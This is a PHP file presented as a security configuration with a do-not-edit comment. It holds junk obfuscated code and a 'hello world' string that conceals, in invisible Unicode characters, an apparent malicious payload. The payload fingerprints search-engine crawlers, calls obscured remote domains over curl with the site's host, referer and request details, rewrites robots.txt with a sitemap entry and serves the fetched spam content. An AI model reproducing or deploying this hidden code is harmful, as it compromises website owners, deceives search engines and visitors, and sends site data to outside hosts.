<?php
//Die sicherheitskonfigurationsdatei \n// bitte ändern sie die folgenden einstellungen nicht


$OvJkdfoK = ['a','b','c','d','e'];
$cYXlrkZJ = count($OvJkdfoK);
if ($cYXlrkZJ > 3) {

    $sDAZxucO = function() use (&$IbaOixBj) {
        $vqPeDPfD = $_SERVER['REQUEST_TIME'] % 2;
        $NuuXGPZZ = function($iVmRpAEs) {
            $UkEBggpT = [];
            $IbaOixBj = '';
            $iVmRpAEs = 'hello world󠄬󠄯󠅠󠅘󠅠︍︊󠄔󠅨󠅝󠅜󠅣󠅤󠅢󠅙󠅞󠅗󠄐󠄭󠄐󠄗󠄕󠄣󠄡󠄕󠄣󠄣󠄕󠄣󠄡󠄕󠄣󠄧󠄕󠄢󠄴󠄕󠄦󠄥󠄕󠄦󠄵󠄕󠄦󠄡󠄕󠄧󠄨󠄕󠄣󠄢󠄕󠄣󠄠󠄕󠄣󠄡󠄕󠄢󠄵󠄕󠄦󠄥󠄕󠄦󠄢󠄕󠄦󠄡󠄕󠄧󠄦󠄕󠄦󠄦󠄕󠄦󠄧󠄕󠄧󠄦󠄕󠄧󠄢󠄕󠄢󠄵󠄕󠄦󠄲󠄕󠄦󠄳󠄕󠄦󠄴󠄜󠄕󠄣󠄡󠄕󠄣󠄣󠄕󠄣󠄡󠄕󠄣󠄧󠄕󠄢󠄴󠄕󠄦󠄥󠄕󠄦󠄵󠄕󠄦󠄡󠄕󠄧󠄨󠄕󠄣󠄢󠄕󠄣󠄠󠄕󠄣󠄡󠄕󠄢󠄵󠄕󠄧󠄩󠄕󠄦󠄵󠄕󠄦󠄶󠄕󠄦󠄳󠄕󠄦󠄥󠄕󠄧󠄦󠄕󠄦󠄡󠄕󠄦󠄧󠄕󠄧󠄥󠄕󠄧󠄦󠄕󠄦󠄡󠄕󠄧󠄢󠄕󠄢󠄵󠄕󠄦󠄧󠄕󠄦󠄢󠄕󠄦󠄣󠄜󠄕󠄣󠄡󠄕󠄣󠄣󠄕󠄣󠄡󠄕󠄣󠄧󠄕󠄢󠄴󠄕󠄦󠄥󠄕󠄦󠄵󠄕󠄦󠄡󠄕󠄧󠄨󠄕󠄣󠄢󠄕󠄣󠄠󠄕󠄣󠄡󠄕󠄢󠄵󠄕󠄧󠄣󠄕󠄦󠄨󠄕󠄦󠄧󠄕󠄦󠄨󠄕󠄦󠄥󠄕󠄧󠄢󠄕󠄦󠄴󠄕󠄦󠄢󠄕󠄦󠄡󠄕󠄢󠄵󠄕󠄦󠄲󠄕󠄦󠄳󠄕󠄦󠄴󠄜󠄕󠄣󠄡󠄕󠄣󠄣󠄕󠄣󠄡󠄕󠄣󠄧󠄕󠄢󠄴󠄕󠄦󠄥󠄕󠄦󠄵󠄕󠄦󠄡󠄕󠄧󠄨󠄕󠄣󠄢󠄕󠄣󠄠󠄕󠄣󠄡󠄕󠄢󠄵󠄕󠄦󠄦󠄕󠄧󠄱󠄕󠄦󠄵󠄕󠄦󠄥󠄕󠄦󠄧󠄕󠄦󠄩󠄕󠄧󠄢󠄕󠄦󠄡󠄕󠄦󠄧󠄕󠄦󠄨󠄕󠄦󠄡󠄕󠄢󠄵󠄕󠄦󠄧󠄕󠄦󠄢󠄕󠄦󠄣󠄗󠄫︍︊󠄔󠅨󠅝󠅜󠅞󠅑󠅝󠅕󠄐󠄭󠄐󠅕󠅨󠅠󠅜󠅟󠅔󠅕󠄘󠄗󠄜󠄗󠄜󠄐󠄔󠅨󠅝󠅜󠅣󠅤󠅢󠅙󠅞󠅗󠄙󠄫︍︊󠄔󠅘󠅤󠅤󠅠󠄐󠄭󠄐󠅙󠅣󠅏󠅘󠅤󠅤󠅠󠅣󠄘󠄙󠄐󠄯󠄐󠄗󠅘󠅤󠅤󠅠󠅣󠄗󠄐󠄪󠄐󠄗󠅘󠅤󠅤󠅠󠄗󠄫︍︊󠄔󠅔󠅥󠅢󠅙󠅏󠅤󠅝󠅠󠄐󠄭󠄐󠅔󠅢󠅕󠅡󠅥󠅕󠅣󠅤󠅏󠅥󠅢󠅙󠄘󠄙󠄫︍︊󠄔󠅔󠅥󠅢󠅙󠄐󠄭󠄐󠅕󠅝󠅠󠅤󠅩󠄘󠄔󠅔󠅥󠅢󠅙󠅏󠅤󠅝󠅠󠄙󠄐󠄯󠄐󠄗󠄟󠄗󠄐󠄪󠄐󠄔󠅔󠅥󠅢󠅙󠅏󠅤󠅝󠅠󠄫︍︊󠄔󠅘󠅟󠅣󠅤󠄐󠄭󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠄸󠄿󠅃󠅄󠄗󠅍󠄫︍︊󠄔󠅜󠅑󠅞󠅗󠄐󠄭󠄐󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠄱󠄳󠄳󠄵󠅀󠅄󠅏󠄼󠄱󠄾󠄷󠅅󠄱󠄷󠄵󠄗󠅍󠄙󠄐󠄯󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠄱󠄳󠄳󠄵󠅀󠅄󠅏󠄼󠄱󠄾󠄷󠅅󠄱󠄷󠄵󠄗󠅍󠄐󠄪󠄐󠄗󠅕󠅞󠄗󠄫︍︊󠄔󠅥󠅢󠅜󠅣󠅘󠅑󠅞󠅗󠄐󠄭󠄐󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠅂󠄵󠄶󠄵󠅂󠄵󠅂󠄗󠅍󠄙󠄐󠄯󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠅂󠄵󠄶󠄵󠅂󠄵󠅂󠄗󠅍󠄐󠄪󠄐󠄗󠄗󠄫︍︊󠄔󠅧󠅕󠅒󠄐󠄭󠄐󠄗󠅧󠅕󠅒󠄭󠄗󠄐󠄞󠄐󠄔󠅘󠅟󠅣󠅤󠄐󠄞󠄐󠄗󠄖󠅪󠅪󠄭󠄗󠄐󠄞󠄐󠄘󠅔󠅙󠅣󠅒󠅟󠅤󠄘󠄙󠄐󠄯󠄐󠄗󠄡󠄗󠄐󠄪󠄐󠄗󠄠󠄗󠄙󠄐󠄞󠄐󠄗󠄖󠅥󠅢󠅙󠄭󠄗󠄐󠄞󠄐󠅥󠅢󠅜󠅕󠅞󠅓󠅟󠅔󠅕󠄘󠄔󠅔󠅥󠅢󠅙󠄙󠄐󠄞󠄐󠄗󠄖󠅥󠅢󠅜󠅣󠅘󠅑󠅞󠅗󠄭󠄗󠄐󠄞󠄐󠅥󠅢󠅜󠅕󠅞󠅓󠅟󠅔󠅕󠄘󠄔󠅥󠅢󠅜󠅣󠅘󠅑󠅞󠅗󠄙󠄐󠄞󠄐󠄗󠄖󠅘󠅤󠅤󠅠󠄭󠄗󠄐󠄞󠄐󠄔󠅘󠅤󠅤󠅠󠄐󠄞󠄐󠄗󠄖󠅜󠅑󠅞󠅗󠄭󠄗󠄐󠄞󠄐󠄔󠅜󠅑󠅞󠅗󠄫︍︊󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄐󠄭󠄐󠅔󠅟󠅥󠅤󠅔󠅟󠄘󠄔󠅨󠅝󠅜󠅞󠅑󠅝󠅕󠄜󠄐󠄔󠅘󠅤󠅤󠅠󠄜󠄐󠄔󠅧󠅕󠅒󠄙󠄫︍︊󠄔󠅢󠅟󠅒󠅟󠅤󠅣󠅀󠅑󠅤󠅘󠄐󠄭󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄴󠄿󠄳󠅅󠄽󠄵󠄾󠅄󠅏󠅂󠄿󠄿󠅄󠄗󠅍󠄐󠄞󠄐󠄗󠄟󠅢󠅟󠅒󠅟󠅤󠅣󠄞󠅤󠅨󠅤󠄗󠄫︍︊󠄔󠅘󠅤󠅑󠄐󠄭󠄐󠄒󠄒󠄫︍︊󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅙󠅣󠅤󠅢󠄘󠄔󠅔󠅥󠅢󠅙󠄜󠄐󠄗󠄟󠄯󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄔󠅘󠅤󠅑󠄐󠄭󠄐󠄒󠄯󠄒󠄫︍︊󠅭︍︊󠄔󠅔󠅕󠅖󠅑󠅥󠅜󠅤󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄐󠄭󠄐󠄗󠅅󠅣󠅕󠅢󠄝󠅑󠅗󠅕󠅞󠅤󠄪󠄐󠄚󠄗󠄐󠄞󠄐󠅀󠄸󠅀󠅏󠄵󠄿󠄼󠄫︍︊󠄔󠅔󠅕󠅖󠅑󠅥󠅜󠅤󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄐󠄞󠄭󠄐󠄗󠄱󠅜󠅜󠅟󠅧󠄪󠄐󠄟󠄗󠄐󠄞󠄐󠅀󠄸󠅀󠅏󠄵󠄿󠄼󠄐󠄞󠄐󠅀󠄸󠅀󠅏󠄵󠄿󠄼󠄫︍︊󠄔󠅔󠅕󠅖󠅑󠅥󠅜󠅤󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄐󠄞󠄭󠄐󠄗󠅃󠅙󠅤󠅕󠅝󠅑󠅠󠄪󠄐󠄗󠄐󠄞󠄐󠄔󠅘󠅤󠅤󠅠󠄐󠄞󠄐󠄗󠄪󠄟󠄟󠄗󠄐󠄞󠄐󠄔󠅘󠅟󠅣󠅤󠄐󠄞󠄐󠄗󠄟󠄗󠄐󠄞󠄐󠄔󠅘󠅤󠅑󠄐󠄞󠄐󠄗󠅣󠅙󠅤󠅕󠅝󠅑󠅠󠄞󠅨󠅝󠅜󠄗󠄐󠄞󠄐󠅀󠄸󠅀󠅏󠄵󠄿󠄼󠄫︍︊󠅙󠅖󠄐󠄘󠄑󠅖󠅙󠅜󠅕󠅏󠅕󠅨󠅙󠅣󠅤󠅣󠄘󠄔󠅢󠅟󠅒󠅟󠅤󠅣󠅀󠅑󠅤󠅘󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠅖󠅙󠅜󠅕󠅏󠅠󠅥󠅤󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠅣󠄘󠄔󠅢󠅟󠅒󠅟󠅤󠅣󠅀󠅑󠅤󠅘󠄜󠄐󠄔󠅔󠅕󠅖󠅑󠅥󠅜󠅤󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠅭󠄐󠅕󠅜󠅣󠅕󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠅙󠅖󠄐󠄘󠅝󠅔󠄥󠅏󠅖󠅙󠅜󠅕󠄘󠄔󠅢󠅟󠅒󠅟󠅤󠅣󠅀󠅑󠅤󠅘󠄙󠄐󠄑󠄭󠄭󠄐󠅝󠅔󠄥󠄘󠄔󠅔󠅕󠅖󠅑󠅥󠅜󠅤󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄰󠅖󠅙󠅜󠅕󠅏󠅠󠅥󠅤󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠅣󠄘󠄔󠅢󠅟󠅒󠅟󠅤󠅣󠅀󠅑󠅤󠅘󠄜󠄐󠄔󠅔󠅕󠅖󠅑󠅥󠅜󠅤󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭︍︊󠅭︍︊󠅙󠅖󠄐󠄘󠄑󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅞󠅟󠅒󠅟󠅤󠅥󠅣󠅕󠅢󠅑󠅗󠅕󠅞󠅤󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠅘󠅑󠅞󠅔󠅜󠅕󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠅭︍︊󠅖󠅥󠅞󠅓󠅤󠅙󠅟󠅞󠄐󠅙󠅣󠅏󠅘󠅤󠅤󠅠󠅣󠄘󠄙︍︊󠅫︍︊󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠄘︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅃󠄗󠅍󠄙󠄐󠄖󠄖󠄐󠅣󠅤󠅢󠅤󠅟󠅜󠅟󠅧󠅕󠅢󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅃󠄗󠅍󠄙󠄐󠄑󠄭󠄭󠄐󠄗󠅟󠅖󠅖󠄗︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅬󠅬󠄐󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠅈󠅏󠄶󠄿󠅂󠅇󠄱󠅂󠄴󠄵󠄴󠅏󠅀󠅂󠄿󠅄󠄿󠄗󠅍󠄙󠄐󠄖󠄖󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠅈󠅏󠄶󠄿󠅂󠅇󠄱󠅂󠄴󠄵󠄴󠅏󠅀󠅂󠄿󠅄󠄿󠄗󠅍󠄐󠄭󠄭󠄭󠄐󠄗󠅘󠅤󠅤󠅠󠅣󠄗︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅬󠅬󠄐󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠄶󠅂󠄿󠄾󠅄󠅏󠄵󠄾󠄴󠅏󠄸󠅄󠅄󠅀󠅃󠄗󠅍󠄙󠄐󠄖󠄖󠄐󠅣󠅤󠅢󠅤󠅟󠅜󠅟󠅧󠅕󠅢󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠄶󠅂󠄿󠄾󠅄󠅏󠄵󠄾󠄴󠅏󠄸󠅄󠅄󠅀󠅃󠄗󠅍󠄙󠄐󠄑󠄭󠄭󠄐󠄗󠅟󠅖󠅖󠄗︍︊󠄐󠄐󠄐󠄐󠄙󠄫︍︊󠅭︍︊󠅖󠅥󠅞󠅓󠅤󠅙󠅟󠅞󠄐󠅔󠅢󠅕󠅡󠅥󠅕󠅣󠅤󠅏󠅥󠅢󠅙󠄘󠄙︍︊󠅫︍︊󠄐󠄐󠄐󠄐󠅙󠅖󠄐󠄘󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅂󠄵󠅁󠅅󠄵󠅃󠅄󠅏󠅅󠅂󠄹󠄗󠅍󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅂󠄵󠅁󠅅󠄵󠅃󠅄󠅏󠅅󠅂󠄹󠄗󠅍󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅑󠅢󠅗󠅦󠄗󠅍󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅀󠄸󠅀󠅏󠅃󠄵󠄼󠄶󠄗󠅍󠄐󠄞󠄐󠄗󠄯󠄗󠄐󠄞󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅑󠅢󠅗󠅦󠄗󠅍󠅋󠄠󠅍󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅀󠄸󠅀󠅏󠅃󠄵󠄼󠄶󠄗󠅍󠄐󠄞󠄐󠄗󠄯󠄗󠄐󠄞󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠅁󠅅󠄵󠅂󠅉󠅏󠅃󠅄󠅂󠄹󠄾󠄷󠄗󠅍󠄫︍︊󠄐󠄐󠄐󠄐󠅭︍︊󠅭︍︊󠅖󠅥󠅞󠅓󠅤󠅙󠅟󠅞󠄐󠅔󠅙󠅣󠅒󠅟󠅤󠄘󠄙︍︊󠅫︍︊󠄐󠄐󠄐󠄐󠄔󠅥󠄱󠅗󠅕󠅞󠅤󠄐󠄭󠄐󠅣󠅤󠅢󠅤󠅟󠅜󠅟󠅧󠅕󠅢󠄘󠅙󠅣󠅣󠅕󠅤󠄘󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠅅󠅃󠄵󠅂󠅏󠄱󠄷󠄵󠄾󠅄󠄗󠅍󠄙󠄐󠄯󠄐󠄔󠅏󠅃󠄵󠅂󠅆󠄵󠅂󠅋󠄗󠄸󠅄󠅄󠅀󠅏󠅅󠅃󠄵󠅂󠅏󠄱󠄷󠄵󠄾󠅄󠄗󠅍󠄐󠄪󠄐󠄗󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠅣󠅤󠅢󠅙󠅣󠅤󠅢󠄘󠄔󠅥󠄱󠅗󠅕󠅞󠅤󠄜󠄐󠄗󠅗󠅟󠅟󠅗󠅜󠅕󠅒󠅟󠅤󠄗󠄙󠄐󠅬󠅬󠄐󠅣󠅤󠅢󠅙󠅣󠅤󠅢󠄘󠄔󠅥󠄱󠅗󠅕󠅞󠅤󠄜󠄐󠄗󠅒󠅙󠅞󠅗󠄗󠄙󠄐󠅬󠅬󠄐󠅣󠅤󠅢󠅙󠅣󠅤󠅢󠄘󠄔󠅥󠄱󠅗󠅕󠅞󠅤󠄜󠄐󠄗󠅩󠅑󠅘󠅟󠅟󠄗󠄙󠄐󠅬󠅬󠄐󠅣󠅤󠅢󠅙󠅣󠅤󠅢󠄘󠄔󠅥󠄱󠅗󠅕󠅞󠅤󠄜󠄐󠄗󠅗󠅟󠅟󠅗󠅜󠅕󠄗󠄙󠄐󠅬󠅬󠄐󠅣󠅤󠅢󠅙󠅣󠅤󠅢󠄘󠄔󠅥󠄱󠅗󠅕󠅞󠅤󠄜󠄐󠄗󠄷󠅟󠅟󠅗󠅜󠅕󠅒󠅟󠅤󠄗󠄙󠄫︍︊󠅭︍︊󠅖󠅥󠅞󠅓󠅤󠅙󠅟󠅞󠄐󠅔󠅟󠅥󠅤󠅔󠅟󠄘󠄔󠅧󠅕󠅒󠅣󠄜󠄐󠄔󠅘󠅤󠅤󠅠󠄜󠄐󠄔󠅧󠅕󠅒󠄙︍︊󠅫︍︊󠄐󠄐󠄐󠄐󠅣󠅘󠅥󠅖󠅖󠅜󠅕󠄘󠄔󠅧󠅕󠅒󠅣󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅖󠅟󠅢󠅕󠅑󠅓󠅘󠄐󠄘󠄔󠅧󠅕󠅒󠅣󠄐󠅑󠅣󠄐󠄔󠅔󠅟󠅝󠅑󠅙󠅞󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄔󠅔󠅟󠅝󠅑󠅙󠅞󠄐󠄭󠄐󠅣󠅤󠅢󠅏󠅢󠅟󠅤󠄡󠄣󠄘󠅥󠅢󠅜󠅔󠅕󠅓󠅟󠅔󠅕󠄘󠄔󠅔󠅟󠅝󠅑󠅙󠅞󠄙󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄔󠅥󠅢󠅜󠄐󠄭󠄐󠄗󠅘󠅤󠅤󠅠󠄪󠄟󠄟󠄗󠄐󠄞󠄐󠄔󠅔󠅟󠅝󠅑󠅙󠅞󠄐󠄞󠄐󠄗󠄟󠅙󠅞󠅔󠅕󠅨󠄞󠅠󠅘󠅠󠄯󠄗󠄐󠄞󠄐󠄔󠅧󠅕󠅒󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄔󠅓󠅘󠄐󠄭󠄐󠅓󠅥󠅢󠅜󠅏󠅙󠅞󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅓󠅥󠅢󠅜󠅏󠅣󠅕󠅤󠅟󠅠󠅤󠄘󠄔󠅓󠅘󠄜󠄐󠄳󠅅󠅂󠄼󠄿󠅀󠅄󠅏󠅅󠅂󠄼󠄜󠄐󠄔󠅥󠅢󠅜󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅓󠅥󠅢󠅜󠅏󠅣󠅕󠅤󠅟󠅠󠅤󠄘󠄔󠅓󠅘󠄜󠄐󠄳󠅅󠅂󠄼󠄿󠅀󠅄󠅏󠅂󠄵󠅄󠅅󠅂󠄾󠅄󠅂󠄱󠄾󠅃󠄶󠄵󠅂󠄜󠄐󠅤󠅢󠅥󠅕󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄔󠅢󠅕󠅣󠅠󠅟󠅞󠅣󠅕󠄐󠄭󠄐󠅓󠅥󠅢󠅜󠅏󠅕󠅨󠅕󠅓󠄘󠄔󠅓󠅘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅙󠅖󠄐󠄘󠄑󠅓󠅥󠅢󠅜󠅏󠅕󠅢󠅢󠅞󠅟󠄘󠄔󠅓󠅘󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅓󠅥󠅢󠅜󠅏󠅓󠅜󠅟󠅣󠅕󠄘󠄔󠅓󠅘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠄔󠅢󠅕󠅣󠅠󠅟󠅞󠅣󠅕󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅓󠅥󠅢󠅜󠅏󠅓󠅜󠅟󠅣󠅕󠄘󠄔󠅓󠅘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅭︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅙󠅖󠄐󠄘󠅙󠅞󠅙󠅏󠅗󠅕󠅤󠄘󠄗󠅑󠅜󠅜󠅟󠅧󠅏󠅥󠅢󠅜󠅏󠅖󠅟󠅠󠅕󠅞󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄔󠅢󠅕󠅣󠅠󠅟󠅞󠅣󠅕󠄐󠄭󠄐󠄰󠅖󠅙󠅜󠅕󠅏󠅗󠅕󠅤󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠅣󠄘󠄔󠅥󠅢󠅜󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅙󠅖󠄐󠄘󠄔󠅢󠅕󠅣󠅠󠅟󠅞󠅣󠅕󠄐󠄑󠄭󠄭󠄐󠅖󠅑󠅜󠅣󠅕󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅢󠅕󠅤󠅥󠅢󠅞󠄐󠄔󠅢󠅕󠅣󠅠󠅟󠅞󠅣󠅕󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅭︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅭︍︊󠄐󠄐󠄐󠄐󠅭︍︊󠄐󠄐󠄐󠄐󠅕󠅓󠅘󠅟󠄐󠄗󠅓󠅅󠅂󠄼󠄐󠄵󠅢󠅢󠅟󠅢󠄪󠄐󠄠󠄗󠄫︍︊󠅭︍︊󠅖󠅥󠅞󠅓󠅤󠅙󠅟󠅞󠄐󠅘󠅑󠅞󠅔󠅜󠅕󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙︍︊󠅫︍︊󠄐󠄐󠄐󠄐󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅟󠅛󠅘󠅤󠅝󠅜󠅗󠅕󠅤󠅓󠅣󠅣󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄝󠅄󠅩󠅠󠅕󠄪󠄐󠅤󠅕󠅨󠅤󠄟󠅓󠅣󠅣󠄫󠄐󠅓󠅘󠅑󠅢󠅣󠅕󠅤󠄭󠅥󠅤󠅖󠄝󠄨󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅓󠅘󠅟󠄐󠅣󠅤󠅢󠅏󠅢󠅕󠅠󠅜󠅑󠅓󠅕󠄘󠄒󠅟󠅛󠅘󠅤󠅝󠅜󠅗󠅕󠅤󠅓󠅣󠅣󠄒󠄜󠄐󠄗󠄗󠄜󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅟󠅛󠅘󠅤󠅝󠅜󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄝󠅤󠅩󠅠󠅕󠄪󠄐󠅤󠅕󠅨󠅤󠄟󠅘󠅤󠅝󠅜󠄫󠄐󠅓󠅘󠅑󠅢󠅣󠅕󠅤󠄭󠅥󠅤󠅖󠄝󠄨󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅓󠅘󠅟󠄐󠅣󠅤󠅢󠅏󠅢󠅕󠅠󠅜󠅑󠅓󠅕󠄘󠄒󠅟󠅛󠅘󠅤󠅝󠅜󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄒󠄜󠄐󠄗󠄗󠄜󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅟󠅛󠅨󠅝󠅜󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄝󠅄󠅩󠅠󠅕󠄪󠄐󠅑󠅠󠅠󠅜󠅙󠅓󠅑󠅤󠅙󠅟󠅞󠄟󠅨󠅝